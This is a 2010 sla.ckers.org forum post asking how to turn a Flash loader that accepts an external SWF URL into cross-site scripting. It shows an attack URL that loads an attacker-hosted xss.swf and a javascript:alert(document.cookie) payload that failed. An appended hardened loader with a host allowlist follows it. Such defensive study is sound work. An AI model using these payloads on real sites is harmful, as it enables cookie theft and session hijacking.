Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
flash RFI
Posted by: dwhite
Date: July 24, 2010 02:00AM

The situation:

hxxp://domain.com/LoadSWF.swf?location=http://domain2.com/xss.swf

LoadSWF is AS3 and uses Loader.load() to load the external swf file.

With xss.swf as AS3 and using Security.allowDomain("domain.com"); and a crossdomain.xml file, LoadSWF will load xss.swf.

The question is what the payload can be.

I tried:

navigateToURL(new URLRequest("javascript:alert(document.cookie);"),"_top");

But that produced security error #2051.



Edited 1 time(s). Last edit at 07/24/2010 03:34AM by dwhite.
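
Seen from the defending side, the loader in the post takes the SWF URL from the `location` query parameter and hands it to Loader.load(). The following is an added example, not part of the original post or the site's code, of a loader that only accepts URLs whose host is on an allowlist; the class name `SafeLoadSWF`, the `ALLOWED_HOSTS` list and the `isAllowed` helper are assumptions made for illustration.

```actionscript
package {
    import flash.display.Loader;
    import flash.display.Sprite;
    import flash.net.URLRequest;

    // Hypothetical hardened variant of the LoadSWF loader described in the post.
    public class SafeLoadSWF extends Sprite {
        // Assumed allowlist: only the site's own host may serve child SWFs.
        private static const ALLOWED_HOSTS:Array = ["domain.com"];

        public function SafeLoadSWF() {
            // Query-string parameters of the root SWF arrive here.
            var location:String = loaderInfo.parameters["location"];
            if (!isAllowed(location)) {
                return; // refuse anything that is not on the allowlist
            }
            var loader:Loader = new Loader();
            loader.load(new URLRequest(location));
            addChild(loader);
        }

        // True only for http(s) URLs whose host is exactly an allowlisted name.
        public static function isAllowed(url:String):Boolean {
            if (url == null) {
                return false;
            }
            // The host may contain DNS characters only, followed by an optional
            // port and then a mandatory "/". Forms such as
            // "http://domain.com@other.example/" or "http://domain.com.other.example/"
            // therefore fail: the first never matches, the second yields a
            // host that is not in the list.
            var m:Array = url.match(/^https?:\/\/([a-z0-9.-]+)(?::\d+)?\//i);
            if (m == null) {
                return false;
            }
            return ALLOWED_HOSTS.indexOf(String(m[1]).toLowerCase()) != -1;
        }
    }
}
```

With this check, the URL from the post (`location=http://domain2.com/xss.swf`) is rejected because `domain2.com` is not in `ALLOWED_HOSTS`, while `http://domain.com/child.swf` (a constructed sample) is loaded.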
